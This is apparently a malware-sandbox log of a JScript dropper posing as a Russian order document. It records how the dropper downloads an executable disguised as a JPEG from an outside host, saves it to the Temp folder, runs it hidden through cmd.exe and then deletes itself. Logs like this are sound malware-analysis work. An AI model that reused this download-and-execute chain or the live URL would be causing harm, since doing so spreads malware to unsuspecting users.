jailme-output.txt
8 Aug 13:27:11 - mailware-jail, a malware sandbox ver. 0.19
8 Aug 13:27:11 - ------------------------
8 Aug 13:27:11 - Arguments: --down malware/20190808/Информация о заказе.2019-0807.docx.js -s malware/20190808/
8 Aug 13:27:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
8 Aug 13:27:11 - Malware files: malware/20190808/Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - Execution timeout set to: 60 seconds
8 Aug 13:27:11 - Output file for sandbox dump: sandbox_dump_after.json
8 Aug 13:27:11 - Output directory for generated files: malware/20190808/
8 Aug 13:27:11 - Download from remote server: Yes
8 Aug 13:27:11 - ==> Preparing Sandbox environment.
8 Aug 13:27:11 - => Executing: env/utils.js quitely
8 Aug 13:27:11 - => Executing: env/eval.js quitely
8 Aug 13:27:11 - => Executing: env/function.js quitely
8 Aug 13:27:11 - => Executing: env/wscript.js quitely
8 Aug 13:27:11 - => Executing: env/browser.js quitely
8 Aug 13:27:11 - => Executing: env/agents.js quitely
8 Aug 13:27:11 - => Executing: env/other.js quitely
8 Aug 13:27:11 - => Executing: env/console.js quitely
8 Aug 13:27:11 - ==> Executing malware file(s). =========================================
8 Aug 13:27:11 - => Executing: malware/20190808/Информация о заказе.2019-0807.docx.js verbosely, reporting silent catches
8 Aug 13:27:11 - Saving: malware/20190808/malware_20190808_Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - Saving: malware/20190808/tr_malware_20190808_Информация о заказе.2019-0807.docx.js
8 Aug 13:27:11 - WScript.scriptfullname = (string) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js'
8 Aug 13:27:11 - WScript.arguments = (object) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js,xyz'
8 Aug 13:27:11 - ActiveXObject(Scripting.Dictionary)
8 Aug 13:27:11 - new Scripting.Dictionary[14]
8 Aug 13:27:11 - Scripting.Dictionary[14].add(a, b)
8 Aug 13:27:11 - Scripting.Dictionary[14].Exists(a) => true
8 Aug 13:27:11 - ActiveXObject(MSXML2.XMLHTTP)
8 Aug 13:27:11 - new MSXML2.XMLHTTP[15]
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].onreadystatechange = (undefined) 'undefined'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].open(GET,http://innovation.xsrv.jp/1c.jpg,0)
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].method = (string) 'GET'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].url = (string) 'http://innovation.xsrv.jp/1c.jpg'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].async = (boolean) 'false'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].send(undefined)
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].method.get() => (string) 'GET'
8 Aug 13:27:11 - MSXML2.XMLHTTP[15].url.get() => (string) 'http://innovation.xsrv.jp/1c.jpg'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].status = (number) '200'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].readystate = (number) '4'
8 Aug 13:27:14 - MSXML2.XMLHTTP[15].statustext = (string) 'OK'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].allresponseheaders = (string) '{"server":"nginx","date":"Thu, 08 Aug 2019 13:27:26 GMT","content-type":"image/jpeg","content-length":"1207984","connection":"close","last-modified":"Wed, 03 Jul 2019 05:34:19 GMT","etag":"\"126eb0-58cc036780cc0\"","x-cache-status":"MISS","x-original ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].status.get() => (number) '200'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].allresponseheaders.get() => (string) '{"server":"nginx","date":"Thu, 08 Aug 2019 13:27:26 GMT","content-type":"image/jpeg","content-length":"1207984","connection":"close","last-modified":"Wed, 03 Jul 2019 05:34:19 GMT","etag":"\"126eb0-58cc036780cc0\"","x-cache-status":"MISS","x-original ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].statustext.get() => (string) 'OK'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].onreadystatechange.get() => (undefined) 'undefined'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].status.get() => (number) '200'
8 Aug 13:27:15 - ActiveXObject(Scripting.FileSystemObject)
8 Aug 13:27:15 - new Scripting.FileSystemObject[16]
8 Aug 13:27:15 - new DriveObject[17](C:)
8 Aug 13:27:15 - DriveObject[17](C:).name = (string) 'C:'
8 Aug 13:27:15 - new Collection[18]([ DriveObject {? id: 17,? _name: 'DriveObject[17](C:)',? _availablespace: '',? _driveletter: '',? _drivetype: '',? _filesystem: '',? _freespace: '',? _isready: '',? _path: '',? _rootfolder: '',? _serialnumber: '',? ... (truncated))
8 Aug 13:27:15 - Collection[18].count = (number) '1'
8 Aug 13:27:15 - ActiveXObject(ADODB.Stream)
8 Aug 13:27:15 - new ADODB_Stream[19]
8 Aug 13:27:15 - Scripting.FileSystemObject[16].GetSpecialFolder(2) => C:\Users\User\AppData\Local\Temp\
8 Aug 13:27:15 - Scripting.FileSystemObject[16].GetTempName() => TempFile_20.tmp
8 Aug 13:27:15 - ADODB_Stream[19].Open()
8 Aug 13:27:15 - ADODB_Stream[19].type = (number) '1'
8 Aug 13:27:15 - MSXML2.XMLHTTP[15].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].Write(str) - 1207984 bytes
8 Aug 13:27:15 - ADODB_Stream[19].size = (number) '1207984'
8 Aug 13:27:15 - ADODB_Stream[19].position = (number) '0'
8 Aug 13:27:15 - ADODB_Stream[19].Read(undefined)
8 Aug 13:27:15 - ADODB_Stream[19].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ActiveXObject(ADODB.Recordset)
8 Aug 13:27:15 - new ADODB_Recordset[21]
8 Aug 13:27:15 - new Collection[22](undefined)
8 Aug 13:27:15 - Collection[22].count = (number) '0'
8 Aug 13:27:15 - new ADODB_Fields[23]
8 Aug 13:27:15 - ADODB_Recordset[21].fields = (object) 'ADODB_Fields[23]'
8 Aug 13:27:15 - ADODB_Stream[19].size.get() => (number) '1207984'
8 Aug 13:27:15 - ADODB_Recordset[21].fields.get() => (object) 'ADODB_Fields[23]'
8 Aug 13:27:15 - ADODB_Fields[23].Append(bin,201,1207984)
8 Aug 13:27:15 - new ADODB_Field[24]
8 Aug 13:27:15 - ADODB_Field[24].name = (string) 'bin'
8 Aug 13:27:15 - ADODB_Field[24].definedsize = (number) '1207984'
8 Aug 13:27:15 - ADODB_Recordset[21].bin = (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Recordset[21].Open()
8 Aug 13:27:15 - ADODB_Recordset[21].AddNew()
8 Aug 13:27:15 - NU: ADODB_Recordset[21]
8 Aug 13:27:15 - G: bin
8 Aug 13:27:15 - ARD: appendChunk
8 Aug 13:27:15 - Ufk: MZ??????????????????????@????????????????????????? ... (truncated)
8 Aug 13:27:15 - ADODB_Recordset[21].bin.get() => (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Field[24].AppendChunk(MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated))
8 Aug 13:27:15 - ADODB_Recordset[21].Update()
8 Aug 13:27:15 - G: bin
8 Aug 13:27:15 - ADODB_Recordset[21].bin.get() => (object) 'ADODB_Field[24]'
8 Aug 13:27:15 - ADODB_Field[24].value.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].SaveToFile(C:\Users\User\AppData\Local\Temp\\TempFile_20.tmp, undefined)
8 Aug 13:27:15 - ADODB_Stream[19].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????>c?jz??9z??9z??9dP?9`??9dP?9j??9]??9q??9z??9X??9z??9{??9dP?93??9dP?9{??9dP?9{??9Richz??9????????PE??L???F?K]?????????????? ... (truncated)'
8 Aug 13:27:15 - ADODB_Stream[19].Close()
8 Aug 13:27:15 - ActiveXObject(Wscript.Shell)
8 Aug 13:27:15 - new WScript.Shell[25]
8 Aug 13:27:15 - WScript.Shell[25].Run(cmd.exe /c C:\Users\User\AppData\Local\Temp\\TempFile_20.tmp, 0, undefined)
8 Aug 13:27:15 - WScript.scriptfullname.get() => (string) 'malware/20190808/?????????? ? ??????.2019-0807.docx.js'
8 Aug 13:27:15 - Scripting.FileSystemObject[16].DeleteFile(malware/20190808/Информация о заказе.2019-0807.docx.js)
8 Aug 13:27:15 - ==> Cleaning up sandbox.
8 Aug 13:27:15 - ==> Script execution finished, dumping sandbox environment to a file.
8 Aug 13:27:22 - The sandbox context has been saved to: sandbox_dump_after.json
8 Aug 13:27:22 - Saving: malware/20190808/C__Users_User_AppData_Local_Temp__TempFile_20.tmp
8 Aug 13:27:22 - Saving: malware/20190808/urls.json